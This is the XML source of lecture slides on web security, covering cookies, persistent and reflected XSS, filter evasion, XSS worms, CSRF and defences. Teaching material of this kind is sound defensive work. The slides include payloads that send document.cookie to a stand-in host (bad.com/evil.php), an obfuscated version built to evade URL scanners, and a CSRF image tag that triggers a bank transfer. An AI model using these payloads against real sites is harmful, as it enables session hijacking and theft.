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68" r:id="rId5"/>
    <p:sldId id="258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66" r:id="rId16"/>
    <p:sldId id="269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2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50A50-0B1B-7742-B70C-3C36CE514935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9F366-BFEA-6F43-882A-B04A26583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8FA4-35A9-764F-BAF9-2FCBB1BD8D88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98B2-92C0-044E-9BB4-AE118DC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web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Cross site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browser’s cookies can be accessed using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM, and so no integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM means acces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>languages, so user can modify</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many languages have their own APIs, but others treat them as text strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies are managed by the browser, and not the OS, so these are kept separately based on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5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Obvious ones:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies can be accessed by any user on the system, so sensitive information is not safe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even encrypted, can be used for session hijacking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Privacy concerns:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Third party cookies: if content is loaded from another site, it may come with a cookie attached.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be used to gather browsing history and usage statistics without explicit consent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even worse when XSS is considered…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4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666"/>
            <a:ext cx="8229600" cy="48392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XSS is at attack where improper input validation allows malicious users to inject code into a website, which is later executed in another visitor’s browser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evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> fools your browser into executing the script of their choice, where your browser believes the script’s origin to be from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bank.com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Nasty part: try to get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to actually send your script, so that no amount of checking will reveal the issue.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82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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS: Code remains for a period of time and is visible to users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nonpersistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> XSS: The injected code does not remain past the attacker’s session (but can still be exploited)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Persistent XSS is more obviously a hazard, but we’ll examine both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(or stored) XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2015-02-26 at 9.26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77" r="-10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886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examples are putting something in a webpage’s guestbook or message board.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simple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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script&gt;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alert(“XSS injection!”);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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any input is saved on the page, so future visitors get an annoying popup.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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6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067"/>
            <a:ext cx="8229600" cy="53170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you can redirect to arbitrary pages, so can include such a redirect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Worse, can interact with cookies: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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = “http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bad.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>evil.php?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=“+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This redirects and then concatenates the user’s cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Could then use the cookie to impersonate the victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can hide such a redirect using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or embedding an image of size 0, as we saw last lecture.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3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persistent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a “reflected” XSS attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The attacker gets you to send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a URL that has some script crammed into it, and the server echoes it back to you in its response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Your browser is none the wiser, and executes the script in the response within the same origin as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bank.com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smtClean="0"/>
              <a:t>commonly used in the form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>clickbait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or spams that embed the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attack.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5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persistent XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2015-02-26 at 9.29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" b="4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727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non-persistent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933"/>
            <a:ext cx="8229600" cy="5300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input is echoed into an HTML response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: a search field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user clicks on this link:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser does to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> returns: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;HTML&gt; Results for &lt;script&gt; …&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser executes in same origin as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and sends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>badguy.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the cookie for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-02-26 at 9.3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7" y="2302933"/>
            <a:ext cx="6790267" cy="15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piece of data sent from a website and stored by a web browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set on the client when server uses the Set-Cookie field in the header of an HTTP response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anytime the user returns to that site, all cookie data is sent to the website as part of the HTTP data.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Quite useful!  Avoid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reauthenticating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and also saves storage space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50646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Best ways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ensure validation of all headers, cookies, query strings, form fields, and hidden fields against a rigorous specification of what should be allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DON’T attempt to identify active content and remove or filter.  Too many types of active content and too many ways of encoding! (more in a bit)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP: Open Web Application Security project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“strongly recommend a positive security policy that specifies what is allowed, rather than negative ones”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0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impossible to prevent all programming errors on the part of a developer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many users choose to disable client side scripts on a per-domain basis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Blacklist versus white list approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: Firefox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NoScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> plugin – will block non-persistent via URL checking, but persistent not so much</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227559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defense evasion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08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 the attack side, obfuscating procedures are now becoming more common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Racing with design of scanners and sanitizers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL encoding allows browsers to interpret special characters safely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So encoded strings can be used as a GET variable in the URL and may escape sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example script: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&lt;script&gt;alert(“hello”);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Becomes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%3Cscript%3Ealert%28%E2%80%9Chello%E2%80%9D%29%3B%3C%2Fscript%3E%0D%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" smtClean="0"/>
              <a:t>(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even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worse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s=”/%73”,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5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evasion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– use scripts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&lt;script&gt;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A = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.cookie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B = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>”; C = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>tp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>”; D = “:w”; E = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>”; F = “bad site”; G = “bad search query”;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document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = B + C + D + E + F + G + A;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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Attacker may avoid URL scanning detection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03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worms are also a new trend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Particularly bad with Facebook, since the ability to communicate with other users is build into the functionality of these sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And therefore JavaScript can get to it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typically executes some payload and then automatically sends to all friends of the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Propagation is extremely fast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12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Malicious web site exploits a user and causes them to unknowingly execute commands on a third party site which trusts the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Easily confused with XSS, but is essentially the opposite thing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> which includes: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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mybank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>moneyxfer.cgi?Account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dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>alice&amp;amt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=50000&amp;to=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>DrEvil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Attack is successful if (for example) cookies in the browser means the bank remember the computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Hopefully unrealistic, but a good demo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4516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CSRF: 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Could also have private webpage, accessible only through VPN/IP address access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, malicious user can gather info by creating a web site that issues cross site requests on behalf of a trusted user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Login attack: instead of authenticating to victim site as the user, requests authenticate the user as the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any information entered by user can then be access by the attacker (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> account info)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7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CSRF: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requests to the web server to have predictable structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Which unfortunately is how HTTP works!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need use of something that can force the victim’s browser to issue such a predictable request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img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 = …&gt;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409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monitor Referrer header to check previously visited sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not done on every browser or setting, though</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Supplement persistent authentication (like a cookie) with another session token passed in every request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker is in theory unable to put this into URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Best prevention: log out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>of sites!!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3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request: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GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> HTTP/1.1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Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>www.example.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Answered by:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRP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HTTP/1.0 200 OK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Content-type: text/html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Set-Cookie: theme=light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Set-Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sessionToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=abc123; Expires=Wed, 09 Jun 2021 10:18:14 GMT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798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now have two cookies sent – one a session cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every following request then has extra data attached, so server can recognize it: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GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>spec.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> HTTP/1.1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Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>www.example.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Cookie: theme=light; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sessionToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=abc123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90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cookie?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600200"/>
            <a:ext cx="3924300" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Generally:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Expiration date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Domain name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Optional path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
